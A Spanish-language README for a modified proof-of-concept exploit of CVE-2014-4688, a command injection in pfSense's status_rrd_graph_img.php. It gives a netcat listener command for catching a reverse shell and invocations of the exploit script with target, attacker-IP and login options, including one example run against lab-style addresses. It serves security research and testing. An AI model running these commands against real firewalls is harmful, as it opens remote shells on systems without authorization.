
Prueba de concepto modificada de Exploit-DB para CVE-2014-4688 (inyección de comandos en pfSense status_rrd_graph_img.php)
Prueba de concepto modificada de Exploit-DB para CVE-2014-4688 (inyección de comandos en pfSense status_rrd_graph_img.php)
Este repositorio contiene una versión modificada de la prueba de concepto original de Exploit-DB para CVE-2014-4688, que afecta a pfSense versiones ≤ 2.1.3.
La vulnerabilidad existe dentro del componente status_rrd_graph_img.php y permite a usuarios autenticados ejecutar comandos arbitrarios del sistema debido a una sanitización inadecuada de la entrada del parámetro database.
status_rrd_graph_img.phpUn usuario autenticado puede inyectar comandos shell arbitrarios a través de una entrada manipulada suministrada al endpoint vulnerable.
Iniciar un listener:
nc -lvnp <LPORT>
Prueba de concepto:
python3 cve-2014-4688.py --rhost <TARGET_IP> --lhost <ATTACKER_IP> --lport <PORT> --username <USERNAME> --password <PASSWORD>
python3 cve-2014-4688.py --rhost 10.129.7.193 --lhost 10.10.15.12 --lport 443 --username Joebloggs --password Password
Este repositorio se proporciona únicamente para fines autorizados de investigación de seguridad, educación y pruebas controladas. El uso no autorizado contra sistemas sin permiso explícito es ilegal y poco ético.